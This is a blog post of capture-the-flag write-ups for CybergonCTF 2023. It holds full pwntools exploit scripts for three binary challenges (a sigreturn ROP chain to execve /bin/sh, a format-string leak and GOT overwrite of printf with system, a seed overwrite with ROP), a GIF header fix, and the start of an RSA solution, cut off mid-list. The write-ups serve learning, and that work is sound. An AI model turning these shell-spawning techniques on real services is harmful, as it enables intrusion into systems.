<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="IntroductionOn 19th August to 21st August I participated in CybergonCTF 2023 which is a CTF that prepare especially for Myanmar players and only Myanmar citizens are eligible to the rewards. However I">
<meta property="og:type" content="article">
<meta property="og:title" content="CybergonCTF 2023 Writeups">
<meta property="og:url" content="https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/index.html">
<meta property="og:site_name" content="0xsh">
<meta property="og:description" content="IntroductionOn 19th August to 21st August I participated in CybergonCTF 2023 which is a CTF that prepare especially for Myanmar players and only Myanmar citizens are eligible to the rewards. However I">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/CybergonCTF-rank-banner.PNG">
<meta property="og:image" content="https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/CybergonCTF-rank.PNG">
<meta property="og:image" content="https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/CybergonCTF-solved.PNG">
<meta property="og:image" content="https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/steg/catch-me-if-you-can/unopenable-fix.gif">
<meta property="og:image" content="https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/crypto/dO%20nOT%20aCCESS/Crypto1.PNG">
<meta property="og:image" content="https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/crypto/dO%20nOT%20aCCESS/fix.png">
<meta property="article:published_time" content="2023-08-21T04:23:46.000Z">
<meta property="article:modified_time" content="2023-08-21T06:35:18.266Z">
<meta property="article:author" content="Narongpol Kijrangsan">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/CybergonCTF-rank-banner.PNG">
    
    
      
        
          <link rel="shortcut icon" href="../../../../images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="../../../../images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="../../../../images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>CybergonCTF 2023 Writeups</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="../../../../../css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="../../../../index.html">Home</a></li><!--
     --><!--
       --><li><a href="../../../../about/">About</a></li><!--
     --><!--
       --><li><a href="../../../../archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/nkd3v">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="../../31/SekaiCTF-2023-Writeups/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="../../12/Tenable-CTF-2023/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&text=CybergonCTF 2023 Writeups"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&is_video=false&description=CybergonCTF 2023 Writeups"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CybergonCTF 2023 Writeups&body=Check out this article: https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&name=CybergonCTF 2023 Writeups&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&t=CybergonCTF 2023 Writeups"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PWN"><span class="toc-number">2.</span> <span class="toc-text">PWN</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#teeny"><span class="toc-number">2.1.</span> <span class="toc-text">teeny</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#autograph"><span class="toc-number">2.2.</span> <span class="toc-text">autograph</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#really-random"><span class="toc-number">2.3.</span> <span class="toc-text">really random</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Steganography"><span class="toc-number">3.</span> <span class="toc-text">Steganography</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Catch-Me-If-You-Can"><span class="toc-number">3.1.</span> <span class="toc-text">Catch Me If You Can</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Cryptography"><span class="toc-number">4.</span> <span class="toc-text">Cryptography</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#EZ-RSA"><span class="toc-number">4.1.</span> <span class="toc-text">EZ RSA</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Now-You-See-Me-1"><span class="toc-number">4.2.</span> <span class="toc-text">Now You See Me 1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dO-nOT-aCCESS"><span class="toc-number">4.3.</span> <span class="toc-text">dO nOT aCCESS</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        CybergonCTF 2023 Writeups
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Narongpol Kijrangsan</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-08-21T04:23:46.000Z" class="dt-published" itemprop="datePublished">2023-08-21</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>On 19th August to 21st August I participated in CybergonCTF 2023 which is a CTF that prepare especially for Myanmar players and only Myanmar citizens are eligible to the rewards. However I as a Thai person still decided to participate in this CTF as just for the sake of fun and learning, and the luckicy it is really fun and is a good learning opportunities, I also encountered many type of problems that I have never seen before which give me many new knowledges in forensics, steganography, cryptography, binary exploitation, and many more! People in the CTF Discord also friendly too, as they very happy to share writeups to other players who want to know how to solve. And here is my writeups, and I hope that whoever read this can gain new knowledge and insights!</p>
<p>Rank: 22nd<br>Score: 2290 points</p>
<p><img src="CybergonCTF-rank-banner.PNG"></p>
<p><img src="CybergonCTF-rank.PNG"></p>
<p><img src="CybergonCTF-solved.PNG"></p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="teeny"><a href="#teeny" class="headerlink" title="teeny"></a>teeny</h3><p>Score: 235<br>Attachment: <a href="pwn/teeny/teeny">teeny</a></p>
<p>This can be solved by using ropper or ROPGadget to find ROP gadgets and we can inject ROP chain by padding our input 8 bytes until hit the return pointer and then we place our ROP chian</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = context.binary = ELF(<span class="string">&#x27;./teeny&#x27;</span>)</span><br><span class="line"></span><br><span class="line">binbash = <span class="number">0x40238</span></span><br><span class="line">pop_rax = <span class="number">0x40018</span></span><br><span class="line">syscall = <span class="number">0x40015</span></span><br><span class="line"></span><br><span class="line">frame = SigreturnFrame()</span><br><span class="line">frame.rax = <span class="number">0x3b</span></span><br><span class="line">frame.rdi = binbash</span><br><span class="line">frame.rsi = <span class="number">0x0</span></span><br><span class="line">frame.rdx = <span class="number">0x0</span></span><br><span class="line">frame.rip = syscall</span><br><span class="line"></span><br><span class="line">payload = flat([</span><br><span class="line">    cyclic(<span class="number">0x8</span>),</span><br><span class="line">    pop_rax,</span><br><span class="line">    <span class="number">0xf</span>,</span><br><span class="line">    syscall,</span><br><span class="line">    frame</span><br><span class="line">])</span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">&#x27;cybergon2023.webhop.me&#x27;</span>, <span class="number">5004</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>Flag: <code>CybergonCTF&#123;5UD0_R0P_ch41n&#125;</code></p>
<h3 id="autograph"><a href="#autograph" class="headerlink" title="autograph"></a>autograph</h3><p>Score: 395<br>Attachment: <a href="pwn/autograph/autograph">autograph</a></p>
<p>The idea of this challenge is to leak elf base address and libc base address using format string vulnerability and overwrite GOT table to replace <code>printf</code> function with <code>system</code> function, so the next time we call it, it will invoke <code>system</code> function</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = context.binary = ELF(<span class="string">&#x27;./autograph&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">&#x27;cybergon2023.webhop.me&#x27;</span>, <span class="number">5001</span>)</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Enter choice: &#x27;</span>, <span class="string">b&#x27;9&#x27;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Enter your notes: &#x27;</span>, <span class="string">b&#x27;%39$llx&#x27;</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&#x27;You Notes:\n&#x27;</span>)</span><br><span class="line">menu_247 = <span class="built_in">int</span>(io.recv(<span class="number">12</span>), <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">elf.address = menu_247 - <span class="number">247</span> - elf.symbols[<span class="string">&#x27;menu&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = flat([</span><br><span class="line">    <span class="string">b&#x27;%8$08s%9$08s&#x27;</span>.ljust(<span class="number">16</span>, <span class="string">b&#x27;\x00&#x27;</span>),</span><br><span class="line">    elf.got[<span class="string">&#x27;printf&#x27;</span>],</span><br><span class="line">    elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">])</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Enter choice: &#x27;</span>, <span class="string">b&#x27;9&#x27;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Enter your notes: &#x27;</span>, payload)</span><br><span class="line">io.recvuntil(<span class="string">b&#x27;You Notes:\n&#x27;</span>)</span><br><span class="line">printf_aslr = <span class="built_in">int</span>(io.recv(<span class="number">8</span>)[:<span class="number">1</span>:-<span class="number">1</span>].<span class="built_in">hex</span>(), <span class="number">16</span>)</span><br><span class="line">puts_aslr = <span class="built_in">int</span>(io.recv(<span class="number">8</span>)[:<span class="number">1</span>:-<span class="number">1</span>].<span class="built_in">hex</span>(), <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(printf_aslr), <span class="built_in">hex</span>(puts_aslr))</span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line">libc.address = printf_aslr - libc.symbols[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = fmtstr_payload(<span class="number">6</span>, &#123;elf.got[<span class="string">&#x27;printf&#x27;</span>]: libc.symbols[<span class="string">&#x27;system&#x27;</span>]&#125;)</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Enter choice: &#x27;</span>, <span class="string">b&#x27;9&#x27;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Enter your notes: &#x27;</span>, payload)</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Enter: not found&#x27;</span>, <span class="string">b&#x27;9&#x27;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Enter your notes: &#x27;</span>, <span class="string">b&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;\n&#x27;</span>, <span class="string">b&#x27;cat flag.txt&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>Flag: <code>CybergonCTF&#123;PHorM47_57rin9_I5_d4N93rou5&#125;</code></p>
<h3 id="really-random"><a href="#really-random" class="headerlink" title="really random"></a>really random</h3><p>Score: 350<br>Attachment: <a href="pwn/really-random/random">random</a></p>
<p>The challenge will ask a user to guess number, luckily the user can overwrite the random seed which make it predictable, in this case we overwrite it with 0 and store the answer.</p>
<p>After we manage to guess all the numbers correctly, program will execute <code>ret</code> instruction which allow us to use ROP chain, which is impossible in case we guess the numbers incorrectly because it will call <code>exit</code> function and have no return</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = context.binary = ELF(<span class="string">&#x27;./random&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">&#x27;cybergon2023.webhop.me&#x27;</span>, <span class="number">5003</span>)</span><br><span class="line"></span><br><span class="line">payload = flat([</span><br><span class="line">    cyclic(<span class="number">0x70</span>),</span><br><span class="line">    <span class="number">0</span>,</span><br><span class="line">    cyclic(<span class="number">0x10</span>),</span><br><span class="line">    <span class="number">0x401016</span>,</span><br><span class="line">    elf.symbols[<span class="string">&#x27;potato&#x27;</span>]</span><br><span class="line">])</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;What is your name?&#x27;</span>, payload)</span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Guess my numbers!&#x27;</span>, <span class="string">b&#x27;103 198 105 115 81 255 74 236 41 205&#x27;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;Correct!&#x27;</span>, <span class="string">b&#x27;cat flag.txt&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>Flag: <code>CybergonCTF&#123;noT_RE4LlY_r4NdOM?&#125;</code></p>
<h2 id="Steganography"><a href="#Steganography" class="headerlink" title="Steganography"></a>Steganography</h2><h3 id="Catch-Me-If-You-Can"><a href="#Catch-Me-If-You-Can" class="headerlink" title="Catch Me If You Can"></a>Catch Me If You Can</h3><p>Score: 50<br>Attachments: <a href="steg/catch-me-if-you-can/unopenable.gif">unopenable.gif</a></p>
<p>Upon looking at the hex dump, we will see that the header of the file is:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">00000000: 3961 f401 f401 f700 0003 0303 7f81 8092  9a..............</span><br><span class="line">00000010: 9493 94d1 ec2f c1ed 5bba e2cb cdcd 5ecb  ...../..[.....^.</span><br><span class="line">00000020: f3ca e9f5 43b9 e697 e5f3 eaed ec3d 4040  ....C........=@@</span><br><span class="line">...&lt;SNIPPED&gt;...</span><br></pre></td></tr></table></figure>

<p>If we lookup in Wikipedia we will see that <code>39 61</code> is part of the GIF hex signature: <code>47 49 46 38 39 61</code>. We can use Python to append the missing bytes:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">buf = <span class="built_in">open</span>(<span class="string">&#x27;unopenable.gif&#x27;</span>, <span class="string">&#x27;rb&#x27;</span>).read()</span><br><span class="line">buf = <span class="string">b&quot;\x47\x49\x46\x38&quot;</span> + buf</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;unopenable-fix.gif&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(buf)</span><br></pre></td></tr></table></figure>

<p><img src="steg/catch-me-if-you-can/unopenable-fix.gif"></p>
<p>Flag: <code>CybergonCTF&#123;YOU_GOT_ME&#125;</code></p>
<h2 id="Cryptography"><a href="#Cryptography" class="headerlink" title="Cryptography"></a>Cryptography</h2><h3 id="EZ-RSA"><a href="#EZ-RSA" class="headerlink" title="EZ RSA"></a>EZ RSA</h3><p>Score: 100<br>Attachments: <a href="crypto/EZ%20RSA/Crypto3.py">Crypto3.py</a> <a href="crypto/EZ%20RSA/output.txt">output.txt</a></p>
<p>Understanding the basic principles of RSA and brute forcing <code>p</code> and <code>q</code> value that cause <code>p * q = n</code> is enough to solve this challenge. We try to XOR given <code>p</code> and <code>q</code> with <code>num</code> in range [512, 512+16) because we know that the bit that cause the XOR result to have 512 value bit have to be from <code>num</code> and not <code>p</code> and <code>q</code> because <code>p</code> and <code>q</code> can only be in range [0, 9] due to the digits splitting in the challenge script</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">px = [<span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span 